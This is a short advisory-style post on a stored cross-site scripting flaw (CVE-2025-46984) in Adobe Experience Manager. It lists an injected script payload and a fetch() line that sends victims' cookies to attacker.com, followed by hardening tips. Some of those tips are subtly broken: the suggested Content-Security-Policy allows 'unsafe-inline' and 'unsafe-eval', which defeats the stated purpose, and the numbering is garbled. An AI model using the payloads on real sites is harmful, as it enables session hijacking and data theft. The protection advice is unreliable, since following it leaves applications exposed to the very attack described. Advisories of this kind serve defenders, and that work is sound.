How CVE-2025-46984 Works
Adobe Experience Manager (AEM) 6.5.22 and earlier fails to properly sanitize user-supplied input in certain form fields, allowing attackers with low privileges to inject malicious JavaScript payloads. When a victim accesses a compromised page, the script executes in their browser session, potentially leading to session hijacking, data theft, or unauthorized actions. The vulnerability arises due to insufficient input validation in the WCM (Web Content Management) component, where crafted HTML/JS persists in the content repository.

What Undercode Say:
Exploitation
1. Payload Injection:
<script>alert(document.cookie)</script>
Submit via vulnerable form fields (e.g., text components).
2. Exfiltrate Cookies:
fetch('https://attacker.com/steal?data=' + btoa(document.cookie));
3. CSRF Pivot:
Combine with AEM’s CSRF tokens for privilege escalation.
Protection

// AEM Filter Example String sanitized = ESAPI.encoder().encodeForHTML(userInput);
2. CSP Header:
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval'

curl -I https://aem-instance/libs/cq/core/content/welcome.html | grep X-XSS-Protection
4. Disable Risky Components:
<!-- /apps/settings/config.author.xml --> <disabledComponents> <component>vulnerable/wcm/text</component> </disabledComponents>
5. Log Monitoring:
grep -r "script.onerror" /var/log/aem/error.log
